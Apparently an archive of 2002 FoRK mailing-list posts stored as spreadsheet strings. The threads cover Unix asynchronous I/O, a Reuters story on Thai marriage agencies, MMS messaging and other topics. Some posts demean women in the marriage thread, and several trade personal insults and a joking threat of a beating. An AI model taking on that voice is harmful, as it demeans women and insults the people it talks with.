&gt; Shouldn't a politician know not to tell the truth? Odds he's impeached byAs the article you forwarded explained in the second line of text,
this politician is a woman.&gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]ob: no-clue-full-stop, as in nearly all Adam Beberg posts.-- 
       Kragen Sitaker     
Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
man.  See http://advogato.org/person/raph/diary.html?start=252 and
http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:&gt; Again, these situations are great, provided everyone is aware that the
&gt; relationship is a contractual one -- he wants a maid, a dog and a
&gt; prostitute he doesn't have to pay, and she wants a country that isn't
&gt; impoverished and teeming with AIDS.You assume that they just match people up and marry them off, and neither is
attracted to the other, which is not the case. Even this has arranged
marrage beat by a long way.Males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comprehend.Yea, the women is definately getting tha bad end of the deal here.You're so easy to taunt :)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t>Adam Beberg writes:
&gt; On Tue, 3 Sep 2002, Kragen Sitaker wrote:
&gt; &gt; Unix acquired nonblocking I/O in the form of select() about 23 years
&gt; &gt; ago, and Solaris has had the particular aio_* calls we are discussing
&gt; &gt; for many years.
&gt; 
&gt; select() "scaling" is a joke at best, and I know you know that. poll() is
&gt; only a bit better.Not only do I know that, the post to which you were responding
explained that, with somewhat more detail than "a joke".  As you
should know, but evidently don't, poll() isn't even "a bit better" ---
in fact, it's about an order of magnitude worse --- for dense file
descriptor sets, which is the normal case.  (Except on operating
systems where select() isn't a system call but a library routine that
calls poll().)&gt; &gt; Very few applications need the aio_* calls --- essentially only
&gt; &gt; high-performance RDBMS servers even benefit from them at all, and
&gt; &gt; most of those have been faking it fine for a while with multiple
&gt; &gt; threads or processes.  This just provides a modicum of extra
&gt; &gt; performance.
&gt; 
&gt; Wrong, it makes a huge difference in even what I consider small programs.Why don't you explain this in more detail?&gt; &gt; Although I don't have a copy of the spec handy, I think the aio_* APIs
&gt; &gt; come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is
&gt; &gt; 13 years old, and which I think documented then-current practice.
&gt; &gt; They might be even older than that.
&gt; 
&gt; Yes, SGI has a patch to the linux kernel to implement the aio_ interfaces,
&gt; but it's still not built in, who knows when it will be. The point is it's
&gt; not portable in either case.You originally said:  Could it be? After 20 years without this feature UNIX finally
  catches up to Windows and has I/O that doesnt [sic] totally suck for
  nontrivial apps? No way!The point --- my point, the point I was discussing; please don't try
to tell me you were trying to make a different point, because I don't
care --- is that you had no clue what you were talking about; Unix
hasn't been without this feature, and in fact has had it since you
were in elementary school, and operating systems without it don't
"totally suck for nontrivial apps".For what it's worth, glibc has actually implemented the aio_* calls
for a while, just in a way that doesn't scale to large numbers of
concurrent I/O requests.  I find references to the glibc
implementation as far back as 1999 and glibc 2.1.1, and I could
probably find much earlier references if I had time:
http://sources.redhat.com/ml/libc-hacker/1999-12/msg00070.html(more details at
http://www.atnf.csiro.au/people/rgooch/linux/docs/io-events.html;
details on the SGI patch are at
http://oss.sgi.com/projects/kaio/faq.html)&gt; &gt; Unix has been multiprocess since 1969, and most Unix implementations
&gt; &gt; have supported multithreading for a decade or more.
&gt; 
&gt; And most UNIX is still kinda-sorta supporting the pthreads (POSIX)
&gt; interface, each in their own 7/8 implementation. You're safe if you
&gt; stick to the basics.Your original complaint was that Unix didn't do multithreading or
multiprogramming well.  Now that I've pointed out how obviously
idiotic that claim is, you've amended your complaint: now, although
individual Unixes do these things well, you complain that their
implementations are not entirely conformant with the POSIX threads
specification.  Well, that's probably true, but I haven't written
pthreads programs in C much myself, so I can't confirm it from my own
experience.  But, even if it's true, it's not a very good reason to
prefer Windows.I'm sure you can provide examples of bugs in particular threading
implementations.  Spare us.  Just shut up.-- 
       Kragen Sitaker     
Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
man.  See http://advogato.org/person/raph/diary.html?start=252 and
http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.</t>
  </si>
  <si>
    <t>On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:&gt; Yet another case where 'marriage' is actually an inappropriate word
&gt; for these guys.  What they want is 'housekeeper' 'dog' and
&gt; 'prostitute'.So, you're saying that product bundling works? Good point.And how is this any different from "normal" marriage exactly? Other then
that the woman not only gets a man, but one in a country where both she and
her offspring will have actual opportunities? Oh and the lack of
"de-feminized, over-sized, self-centered, mercenary-minded" choices?
- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Adam,Thursday, September 05, 2002, 11:33:18 PM, you wrote:
ALB&gt; So, you're saying that product bundling works? Good point.Sometimes I wish I was still in CA.  You deserve a good beating every
so often...  (anyone else want to do the honors?)ALB&gt; And how is this any different from "normal" marriage exactly? Other then
ALB&gt; that the woman not only gets a man, but one in a country where both she and
ALB&gt; her offspring will have actual opportunities? Oh and the lack of
ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?Mmkay.  For the nth time Adam, we don't live in the land of
Adam-fantasy.  Women actually are allowed to do things productive,
independent and entirely free of their male counterparts.  They aren't
forced to cook and clean and merely be sexual vessels.   Sometimes,
and this will come as a shock to you, no doubt, men and women even
find -love- (which is the crucial distinction between this system) and
they marry one another for the satisfaction of being together.   I
know, far-fetched and idealistically crazy as it is, but such things
do happen.   I can guarantee you, if my mother was approached by my
father, and 25 years ago, he commented on her cleaning ability as a
motivator for marrying her, we would not be having this conversation
now.If guys still have silly antequated ideas about 'women's role' then
their opportunities for finding women _will_ be scarce.   Again, these
situations are great, provided everyone is aware that the relationship
is a contractual one -- he wants a maid, a dog and a prostitute he
doesn't have to pay, and she wants a country that isn't impoverished
and teeming with AIDS.  A contract, versus a true love-interest
marriage.Egh.  I really need to stop analyzing your posts to this extent.   I
blame law school and my cat.-BBALB&gt; - Adam L. "Duncan" Beberg
ALB&gt;   http://www.mithral.com/~beberg/
ALB&gt;   beberg@mithral.com-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Ah yes..Yet another case where 'marriage' is actually an inappropriate word
for these guys.  What they want is 'housekeeper' 'dog' and
'prostitute'.All I can say, is I hope these girls come out, take the men for what
they have, be glorified housekeepers for as short a term as possible,
and enjoy the free travel.Love my arse.-BB
ALB&gt; ...an alternative to the "kind of de-feminized, over-sized, self-centered,
ALB&gt; mercenary-minded lady available on the British singles scene,"ALB&gt; Glad to see American culture is making it's way into the British bars too :)
ALB&gt; God bless us uncivilized bastards, every one.ALB&gt; Still, definately something not right about the below. People are now
ALB&gt; cheaper then a decent laptop? (ok, so we knew that already)ALB&gt; -------------ALB&gt; Selling Wedded Bliss Big Business in Thailand
ALB&gt; Thu Aug 29,10:19 AM ET
ALB&gt; By Andrew MarshallALB&gt; BANGKOK, Thailand (Reuters) - English dentist Ken Moylan came to Thailand
ALB&gt; looking for a wife. It took two hours to find her.ALB&gt; "The first day I went out with Wan, she came back to my hotel and hung all
ALB&gt; my clothes up and tidied the room. I thought it was marvelous," he said. "I
ALB&gt; knew then there was something special."ALB&gt; Moylan, 49, is one of thousands of men who use introduction agencies to meet
ALB&gt; -- and marry -- Thai women. He lives in England now with 28-year-old Wan,
ALB&gt; who is expecting their first child.ALB&gt; Critics of marriage agencies say they exploit the grinding poverty of women
ALB&gt; in developing countries, offering dreams of a new life in the West that
ALB&gt; often turn sour. But Moylan says he has no regrets about coming to Thailand
ALB&gt; in search of a wife.ALB&gt; "I got to Thailand at 2 p.m., and by 4 p.m. I'd met Wan," he said. "I knew I
ALB&gt; found her attractive. I could tell straight away that she was very caring."ALB&gt; Moylan spent a week in Thailand, and after returning to England kept in
ALB&gt; touch with Wan by phone and mail. Six months later she came to England and
ALB&gt; the couple married.ALB&gt; MR. MARRIAGEALB&gt; Lawrence Lynch, 49, runs Thai Professional Introduction Services, the agency
ALB&gt; Moylan used to meet his wife. Lynch, who calls himself "Mr. Marriage,"
ALB&gt; started the company after also marrying a Thai woman through an introduction
ALB&gt; agency.ALB&gt; Since then he has helped set up hundreds of marriages.ALB&gt; "In the last five years we've done about 400," he said. "To the best of my
ALB&gt; knowledge, they have all been successful."ALB&gt; Male clients pay $2,213 for the service, although men from countries that
ALB&gt; require them to handle some of the visa work on their own get a discount.
ALB&gt; Clients then get to view catalogs and videos of hundreds of Thai women
ALB&gt; looking for a husband. If they like what they see they come to Bangkok.ALB&gt; Clients are introduced to several women in chaperoned meetings in Lynch's
ALB&gt; office -- encounters that can often be awkward given mutual shyness and
ALB&gt; language problems.ALB&gt; "We find that the gentlemen are usually just as nervous as the ladies,"
ALB&gt; Lynch said. "But once they start meeting the ladies they soon relax."ALB&gt; After the first meeting, couples can decide to go on dates to get to know
ALB&gt; each other better. Within two weeks of arrival, Lynch says, almost every
ALB&gt; client has found a potential wife.ALB&gt; "At the end of a fortnight it's very, very rare for a guy to go back and
ALB&gt; think he hasn't made his mind up," he said. In most cases, marriage follows,
ALB&gt; usually within the next year.ALB&gt; Roongthip Kamchat, managing director of Thai No. 1 Connections, a
ALB&gt; Bangkok-based agency, says she has introduced about 1,000 couples, and less
ALB&gt; than 10 percent have broken up.ALB&gt; Roongthip says she sometimes has a difficult time calming men who have just
ALB&gt; arrived in Bangkok looking for a wife.ALB&gt; "Sometimes they are very nervous," she said. "And sometimes they are very
ALB&gt; impatient and say 'Give me a lady, I want to get married now.' I say: 'Calm
ALB&gt; down, OK, we'll talk."'ALB&gt; But if men are really in a hurry, Roongthip says, she can find them a wife
ALB&gt; and get them married within a week. Lynch says clients he has found wives
ALB&gt; for include a blind man, a man with one leg and a man with post-traumatic
ALB&gt; stress disorder.ALB&gt; WHY?ALB&gt; Similar marriage agencies can be found in many developing countries. Critics
ALB&gt; say they thrive on the neediness of lonely Western men who are unable to
ALB&gt; form relationships in their own country, and on the desperation of
ALB&gt; impoverished women who believe they can find a better life in the West.ALB&gt; But Moylan says that if the arrangement makes both partners happy, there is
ALB&gt; no reason to object. "If you talk about people who are needy, I think
ALB&gt; everybody wants someone to love them, and wants someone to love, so yes, I
ALB&gt; need Wan," he said.ALB&gt; "Thai women are dissatisfied with life in Thailand. I think there's no
ALB&gt; secret there. They are looking for a better life. I don't have a problem
ALB&gt; with that. In return they are willing to give a lot of love and care to
ALB&gt; their future husband."ALB&gt; Lynch says men are dissatisfied with Western women too, and that is why they
ALB&gt; choose to use his agency.ALB&gt; His brochure promises an alternative to the "kind of de-feminized,
ALB&gt; over-sized, self-centered, mercenary-minded lady available on the British
ALB&gt; singles scene," and says he can make dreams come true even for men who are
ALB&gt; not "God's gift to women."ALB&gt; Roongthip said many Western men found it difficult to meet women in their
ALB&gt; own countries -- and found Thai women attractive.ALB&gt; "They don't know how to meet women. Even if they go to pubs or discotheques
ALB&gt; or restaurants or department stores, how can they ask people to marry them?
ALB&gt; Impossible," she said.ALB&gt; "Many Thai girls are slim, have long hair, black eyes, small nose. They are
ALB&gt; good at taking care and joking and laughing, not strict. Different from
ALB&gt; ladies from other countries."ALB&gt; Although many couples married through agencies have a considerable age gap,
ALB&gt; the agencies say this is not a problem. They say language problems are also
ALB&gt; not a major obstacle.ALB&gt; "Thai ladies are not ageist, and they have no qualms whatsoever about having
ALB&gt; a husband who is significantly older," Lynch said. "When I met my wife she
ALB&gt; couldn't speak a word of English. We muddled along with a phonetic
ALB&gt; dictionary. The ladies are very keen to learn English and they pick it up
ALB&gt; very quickly."ALB&gt; Many agencies also offer tuition for woman on what to expect when they move
ALB&gt; to the West.ALB&gt; "We have kitchens, we have study classes," Roongthip said. "We teach them
ALB&gt; how to eat, and when to make tea."ALB&gt; PITFALLSALB&gt; But not all dreams come true. "Bee" is a 26-year-old Thai woman who went to
ALB&gt; Switzerland two years ago with a man she met through an agency. Now she is
ALB&gt; back in Bangkok, sad and angry.ALB&gt; "He had no friends, and I was so lonely," she said. "I tried to make him
ALB&gt; happy but he just wanted sex and somebody to keep his house clean. He never
ALB&gt; spoke to me."ALB&gt; Bee came back to Bangkok earlier this year. "I thought I would be happy
ALB&gt; there," she said. "But it was the worst time of my life."ALB&gt; Lynch says that while some agencies are badly run, he makes checks to ensure
ALB&gt; unsuitable candidates are weeded out.ALB&gt; "We are ethical and professional," he said. "We will not take on all
ALB&gt; comers."ALB&gt; Moylan says that despite possible pitfalls, his own marriage is proof the
ALB&gt; arrangement can work. Wan's sister has just signed up with Lynch's company,
ALB&gt; looking for a foreign husband.ALB&gt; "Perhaps there are cases of women being exploited. I'm sure there are,"
ALB&gt; Moylan said. "But in the majority of cases the women get a good deal."-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>Ouch.... hooooo....Cheers,
RAH--- begin forwarded text
Date: Thu,  5 Sep 2002 09:17:13 -0700
From: Same Guy
Subject: Re: Electric car an Edsel...
To: "R. A. Hettinga"  Bob,This guy's an idiot.I design loads for systems with the 50 kV capacitors.  One of those has 864
of such capacitors and stores only 10 megajoules, which means 11 kilojoules
each.  They weigh 125 kg.You need high energy per unit mass, and the capacitive system I picked
maximizes that.It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voltage.Ignore him.  He's a waste of my time.------------------------
  From: "R. A. Hettinga" 
  Subject: Re: Electric car an Edsel...
  Date: Wed, 4 Sep 2002 15:31:39 -0400
  To: Some people...--- begin forwarded text
Date: Wed, 4 Sep 2002 07:59:10 -0700 (PDT)
From: "Adam L. Beberg" 
To: "R. A. Hettinga" 
cc: 
Subject: Re: Electric car an Edsel...On Wed, 4 Sep 2002, R. A. Hettinga wrote:&gt;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Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com---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---------------End of Original Message--------------------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</si>
  <si>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...an alternative to the "kind of de-feminized, over-sized, self-centered,
mercenary-minded lady available on the British singles scene,"Glad to see American culture is making it's way into the British bars too :)
God bless us uncivilized bastards, every one.Still, definately something not right about the below. People are now
cheaper then a decent laptop? (ok, so we knew that already)-------------Selling Wedded Bliss Big Business in Thailand
Thu Aug 29,10:19 AM ET
By Andrew MarshallBANGKOK, Thailand (Reuters) - English dentist Ken Moylan came to Thailand
looking for a wife. It took two hours to find her."The first day I went out with Wan, she came back to my hotel and hung all
my clothes up and tidied the room. I thought it was marvelous," he said. "I
knew then there was something special."Moylan, 49, is one of thousands of men who use introduction agencies to meet
-- and marry -- Thai women. He lives in England now with 28-year-old Wan,
who is expecting their first child.Critics of marriage agencies say they exploit the grinding poverty of women
in developing countries, offering dreams of a new life in the West that
often turn sour. But Moylan says he has no regrets about coming to Thailand
in search of a wife."I got to Thailand at 2 p.m., and by 4 p.m. I'd met Wan," he said. "I knew I
found her attractive. I could tell straight away that she was very caring."Moylan spent a week in Thailand, and after returning to England kept in
touch with Wan by phone and mail. Six months later she came to England and
the couple married.MR. MARRIAGELawrence Lynch, 49, runs Thai Professional Introduction Services, the agency
Moylan used to meet his wife. Lynch, who calls himself "Mr. Marriage,"
started the company after also marrying a Thai woman through an introduction
agency.Since then he has helped set up hundreds of marriages."In the last five years we've done about 400," he said. "To the best of my
knowledge, they have all been successful."Male clients pay $2,213 for the service, although men from countries that
require them to handle some of the visa work on their own get a discount.
Clients then get to view catalogs and videos of hundreds of Thai women
looking for a husband. If they like what they see they come to Bangkok.Clients are introduced to several women in chaperoned meetings in Lynch's
office -- encounters that can often be awkward given mutual shyness and
language problems."We find that the gentlemen are usually just as nervous as the ladies,"
Lynch said. "But once they start meeting the ladies they soon relax."After the first meeting, couples can decide to go on dates to get to know
each other better. Within two weeks of arrival, Lynch says, almost every
client has found a potential wife."At the end of a fortnight it's very, very rare for a guy to go back and
think he hasn't made his mind up," he said. In most cases, marriage follows,
usually within the next year.Roongthip Kamchat, managing director of Thai No. 1 Connections, a
Bangkok-based agency, says she has introduced about 1,000 couples, and less
than 10 percent have broken up.Roongthip says she sometimes has a difficult time calming men who have just
arrived in Bangkok looking for a wife."Sometimes they are very nervous," she said. "And sometimes they are very
impatient and say 'Give me a lady, I want to get married now.' I say: 'Calm
down, OK, we'll talk."'But if men are really in a hurry, Roongthip says, she can find them a wife
and get them married within a week. Lynch says clients he has found wives
for include a blind man, a man with one leg and a man with post-traumatic
stress disorder.WHY?Similar marriage agencies can be found in many developing countries. Critics
say they thrive on the neediness of lonely Western men who are unable to
form relationships in their own country, and on the desperation of
impoverished women who believe they can find a better life in the West.But Moylan says that if the arrangement makes both partners happy, there is
no reason to object. "If you talk about people who are needy, I think
everybody wants someone to love them, and wants someone to love, so yes, I
need Wan," he said."Thai women are dissatisfied with life in Thailand. I think there's no
secret there. They are looking for a better life. I don't have a problem
with that. In return they are willing to give a lot of love and care to
their future husband."Lynch says men are dissatisfied with Western women too, and that is why they
choose to use his agency.His brochure promises an alternative to the "kind of de-feminized,
over-sized, self-centered, mercenary-minded lady available on the British
singles scene," and says he can make dreams come true even for men who are
not "God's gift to women."Roongthip said many Western men found it difficult to meet women in their
own countries -- and found Thai women attractive."They don't know how to meet women. Even if they go to pubs or discotheques
or restaurants or department stores, how can they ask people to marry them?
Impossible," she said."Many Thai girls are slim, have long hair, black eyes, small nose. They are
good at taking care and joking and laughing, not strict. Different from
ladies from other countries."Although many couples married through agencies have a considerable age gap,
the agencies say this is not a problem. They say language problems are also
not a major obstacle."Thai ladies are not ageist, and they have no qualms whatsoever about having
a husband who is significantly older," Lynch said. "When I met my wife she
couldn't speak a word of English. We muddled along with a phonetic
dictionary. The ladies are very keen to learn English and they pick it up
very quickly."Many agencies also offer tuition for woman on what to expect when they move
to the West."We have kitchens, we have study classes," Roongthip said. "We teach them
how to eat, and when to make tea."PITFALLSBut not all dreams come true. "Bee" is a 26-year-old Thai woman who went to
Switzerland two years ago with a man she met through an agency. Now she is
back in Bangkok, sad and angry."He had no friends, and I was so lonely," she said. "I tried to make him
happy but he just wanted sex and somebody to keep his house clean. He never
spoke to me."Bee came back to Bangkok earlier this year. "I thought I would be happy
there," she said. "But it was the worst time of my life."Lynch says that while some agencies are badly run, he makes checks to ensure
unsuitable candidates are weeded out."We are ethical and professional," he said. "We will not take on all
comers."Moylan says that despite possible pitfalls, his own marriage is proof the
arrangement can work. Wan's sister has just signed up with Lynch's company,
looking for a foreign husband."Perhaps there are cases of women being exploited. I'm sure there are,"
Moylan said. "But in the majority of cases the women get a good deal."</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:&gt; If guys still have silly antequated ideas about 'women's role' then
&gt; their opportunities for finding women _will_ be scarce.  What is silly and antiquated depends a lot on which country you live in.I don't have statistics on the love half life, but it seems long-term 
relationships use something else for glue.Clearly our non-silly non-antiquated ideas about relationships have
resulted in mostly short-duration relationships and single-parented,
dysfunctional kids (not enough of them too boot, so to keep our
demographics from completely keeling over we're importing them from places
with mostly silly and antiquated ideas).At least from the viewpoint of demographics sustainability and
counterpressure to gerontocracy and resulting innovatiophobia we're doing
something wrong.Maybe we should really go dirty Tleilaxu all the way.
</t>
  </si>
  <si>
    <t xml:space="preserve">i agree with rob. i think if the phones (and mms is building traction in europe in handsets), this might be interesting. bottom line is will it a) help sell phones and b) bill enough time on the wcarriers networks?anyone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them.-h&gt;From: "Rob Shavell" 
&gt;To: "'Mike Masnick'" 
&gt;Cc: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fork@spamassassin.taint.org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trivial in nature. picture speaks a thousand words.
&gt;
&gt;This does nothing to answer my question.  I *do* care about content.  Hell,
&gt;if I could be convinced that people would send stupid pics back and forth
&gt;all day, I'd have a different opinion of this.  I just am not convinced
&gt;that they will (stupid or not).
&gt;
&gt;While a picture may be worth a thousand words (and this is the same
&gt;argument the guy who works for me made), how many people do you know who
&gt;communicate by pictures?  Sure, it sounds nice to say that a picture is
&gt;such an efficient messaging mechanism, but how often do you actually find
&gt;yourself drawing someone a picture to explain something?
&gt;
&gt;I don't buy it.
&gt;
&gt;For most messages, text works fine and is the most efficient
&gt;mechanism.  For some messages, pictures do the job, but I would say not
&gt;nearly as often as words.  Why do you think Pictionary and Charades and
&gt;such are games?  Because images are usually not the most efficient way to
&gt;get a message across.
&gt;
&gt;&gt;misc ramblings: i suppose you skeptical forkers would have said the same
&gt;&gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
&gt;&gt;resultion elswhere.  and yet, it had great decentralizing impact - the
&gt;plant
&gt;&gt;had to be downsized and pushed to the retail operation - the digital
&gt;camera,
&gt;&gt;and finally the integrated digital camera phone brings this cycle of
&gt;&gt;decentralization in photography to a logical conclusion (which will put the
&gt;&gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
&gt;&gt;didn't take off because its easy, it took off because it costs less.  its
&gt;&gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
&gt;&gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
&gt;&gt;SMS cannibilizes the voice rev's they bought their networks to handle.
&gt;
&gt;Again, this is the same argument my colleague made (along with "you just
&gt;don't understand kids today, and they'll run with this").  I wasn't saying
&gt;that MMS wouldn't take off because it wasn't high quality or that it wasn't
&gt;easy.  I was saying that I couldn't see why people would use it in a way
&gt;that "changed the face of communications".
&gt;
&gt;I'm looking for the compelling reason (even if it's a stupid one) why
&gt;people would want to do this.  Sure, if they integrate cameras into the
&gt;phone, and the quality improves (even only marginally) I can certainly see
&gt;people taking pictures with their cameras and occasionally sending them to
&gt;other people.  But, mostly, I don't see what the benefit is to this over
&gt;sending them to someone's email address, or putting together an online (or
&gt;offline) photoalbum.
&gt;
&gt;I don't think 1 hour photos are trivial.  People want to see their own pics
&gt;right away, and the quality is plenty good enough for snapshots.  That's
&gt;one of the main reasons why digital cameras are catching on.  The instant
&gt;view part.  I'm guessing your argument is that people not only want
&gt;"instant view", but also "instant show".  Which is what this service
&gt;offers.  I'm not convinced that most people want "instant show".  I think
&gt;people like to package their pictures and show them.  That's why people put
&gt;together fancy albums, and sit there and force you to go through them while
&gt;they explain every picture.  Sure, occasionally "instant show" is nice, but
&gt;it's just "nice" on occasion.  I still can't see how it becomes a integral
&gt;messaging method.
&gt;
&gt;What's the specific benefit of taking a picture and immediately sending it
&gt;from one phone to another?  There has to be *some* benefit, even if it's
&gt;silly if people are going to flock to it.
&gt;
&gt;I'm searching... no one has given me a straight answer yet.
&gt;
&gt;The *only* really intriguing idea I've heard about things like MMS lately
&gt;are Dan Gillmor's assertion that one day in the near future some news event
&gt;will happen, and a bunch of people will snap pictures with their mobile
&gt;phones, from all different angles, and those photos tell the real story of
&gt;what happened - before the press even gets there.
&gt;
&gt;Willing to be proven wrong,
&gt;Mike
&gt;
&gt;PS If the wireless carriers continue to price these services as stupidly as
&gt;they currently are, then MMS is *never* going to catch on.
</t>
  </si>
  <si>
    <t xml:space="preserve">LOL!  They're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  There is little power struggle in the lifestyles of the 
people who use these.  There is power exchange instead.  Lots of 
variations on the definition, but this one's from Gloria Brame's site:Power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It's not coercion, 
it is creative sensuality.  (:
CindyOn Thu, 5 Sep 2002, Eirikur Hallgrimsson wrote:&gt; On Wednesday 04 September 2002 10:59 pm, CDale wrote:
&gt; &gt; Someone needs to tell the mayor about this:
&gt; &gt; http://www.cb-2000.com/
&gt; 
&gt; "Chastity" technologies were doomed from the start, and I'll add chemical 
&gt; ones to the trash heap.  (Yeah, Cindy, these are decorative toys for the 
&gt; subculture, but....)  
&gt; 
&gt; Generally,someone is attempting to preserve a relationship with this 
&gt; nonsense, when quite plainly the the relationship is in a state where 
&gt; preserving it is of little value.  Hardware is of no real use save for 
&gt; playing the power-struggle game.   I don't want to see the future of this.
&gt; "Invisible Fence" for your mate.   "Must wear" location transponders and 
&gt; endocrine monitors.   More movies like "Minority Report."
&gt; 
&gt; It seems so automatic for people to reach for coercive solutions.   So 
&gt; surprizing given the low absolute effectiveness of coercion in the absense 
&gt; of overwhelming force advantage.
&gt; 
&gt; Eirikur
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 04 September 2002 10:59 pm, CDale wrote:
&gt; Someone needs to tell the mayor about this:
&gt; http://www.cb-2000.com/"Chastity" technologies were doomed from the start, and I'll add chemical 
ones to the trash heap.  (Yeah, Cindy, these are decorative toys for the 
subculture, but....)  Generally,someone is attempting to preserve a relationship with this 
nonsense, when quite plainly the the relationship is in a state where 
preserving it is of little value.  Hardware is of no real use save for 
playing the power-struggle game.   I don't want to see the future of this.
"Invisible Fence" for your mate.   "Must wear" location transponders and 
endocrine monitors.   More movies like "Minority Report."It seems so automatic for people to reach for coercive solutions.   So 
surprizing given the low absolute effectiveness of coercion in the absense 
of overwhelming force advantage.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Eugen Leitl wrote:&gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
&gt; 
&gt; &gt; If guys still have silly antequated ideas about 'women's role' then
&gt; &gt; their opportunities for finding women _will_ be scarce.  
&gt; 
&gt; What is silly and antiquated depends a lot on which country you live in.It also depends on what the fad is or what is in style.  (:&gt; I don't have statistics on the love half life, but it seems long-term 
&gt; relationships use something else for glue.
&gt;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ideas).Actualy our silly antiquated ideas about relationships and love have 
resulted in the bleedings of many upon many a page (and musical  instrumnet, 
and canvas)  What's the problem if we dash a little Mrs. Dash on them?  (:  
Or cayenne.  Or ginger. (mm ask me about ginger root play).  And let me tell you this: just because a child happens to be 
single-parented (what a word), does not mean that child is dysfunctional 
or lives in a dysfunctional home.  The govt/media/church has tried to make 
it look like there is a disintegration, when in fact, there is a coming 
together of other family members and friends to raise children.  It's not 
decaying -- it's changing.  Nothing wrong with change.
&gt; At least from the viewpoint of demographics sustainability and
&gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
&gt; something wrong.
&gt; 
&gt; Maybe we should really go dirty Tleilaxu all the way.
&gt; Maybe y'all should buy m-w some more bandwidth.
C
-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t>This is preaty neat.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comPitch Dark Bar Opens for Blind Dates
Thu Sep 5,10:09 AM ETBERLIN (Reuters) - Diners at Berlin's newest restaurant cannot see what they
are eating and have to be guided to their table by blind waiters because the
bar is pitch black.The restaurant, which opened Wednesday, aims to make guests concentrate on
senses other than sight.Holding on to one another, the first visitors followed waiter Roland
Zimmermann, 33, into the dining room. Although the PhD student has been
blind since childhood, he is the only one able to point out chairs, cutlery
and drinks."I'm putting your plate right in front of you," Zimmermann said. "I can't
find my mouth," one voice replied out of the dark. "I wonder what this dish
is -- Lasagne? Or some casserole?" another invisible guest said.In the "unsicht-Bar," which means invisible in German, diners cannot choose
complete dishes from the menu but can only indicate whether they would like
a fish, meat or vegetarian option."We want people to have an extraordinary experience of tasting, feeling and
smelling," said Manfred Scharbach, head of the organization for blind and
sight-restricted people, which is running the bar."People are surprised that their tongues and taste senses are taking over
and are sending signals, which their eyes would normally have sent," he
added.Of the 30 staff, 22 are blind.An average meal lasts about three hours and the waiters are always around to
help, Scharnbach said.And at the end of the night, they will even reveal what customers have
actually been eating.</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Kragen Sitaker wrote:&gt; Adam Beberg writes:
&gt; &gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by
&gt; 
&gt; As the article you forwarded explained in the second line of text,
&gt; this politician is a woman.
&gt; 
&gt; &gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
&gt; 
&gt; ob: no-clue-full-stop, as in nearly all Adam Beberg posts.posts, or pouts?
in rare webster form,
C
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, CDale wrote:&gt; It also depends on what the fad is or what is in style.  (:DNA's idea of fads is on the 100 kiloyear scale, unfortunately. As long as
current fads don't involve in-vivo rewrite of the genome, homeoboxes
including (now there's a problem for you, homeoboxing the adult), they're
not all that smart an idear.
&gt; Actualy our silly antiquated ideas about relationships and love have
&gt; resulted in the bleedings of many upon many a page (and musical
&gt; instrumnet, and canvas)  What's the problem if we dash a little Mrs.Art is sure nice. However, if art is our first priority we're kinda
fux0red, if we've set our sight on a sustainable culture.&gt; Dash on them?  (:  Or cayenne.  Or ginger. (mm ask me about ginger
&gt; root play).
&gt; 
&gt; And let me tell you this: just because a child happens to be
&gt; single-parented (what a word), does not mean that child is
&gt; dysfunctional or lives in a dysfunctional home.  The govt/media/churchOur firmware is not built to be single-parented. You can counteract that
somewhat by exposing the kid to a community of close friends, but not too
many do that.&gt; has tried to make it look like there is a disintegration, when in
&gt; fact, there is a coming together of other family members and friends
&gt; to raise children.  It's not decaying -- it's changing.  Nothing wrong
&gt; with change.I don't know what exactly is wrong, but something is definitely wrong.  
This is way too important to be left to just our intuition of what is
right and what is wrong.
&gt; &gt; At least from the viewpoint of demographics sustainability and
&gt; &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
&gt; &gt; something wrong.
&gt; &gt; 
&gt; &gt; Maybe we should really go dirty Tleilaxu all the way.
&gt; &gt; 
&gt; 
&gt; Maybe y'all should buy m-w some more bandwidth.m-w?
</t>
  </si>
  <si>
    <t xml:space="preserve">these are being advertised all over the UK/ Chief come-on seems to be to the 
same people who use phones for text messaging--i.e. teenagers. "Hi, we're at 
the beach and I met this awesome guy--here's his pic"Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl:
&gt;Clearly our non-silly non-antiquated ideas about relationships have 
&gt;resulted in mostly short-duration relationships and single-parented, 
&gt;dysfunctional kids ..Don't swallow too quickly what you have read about
more traditional cultures, today or in the past. Do
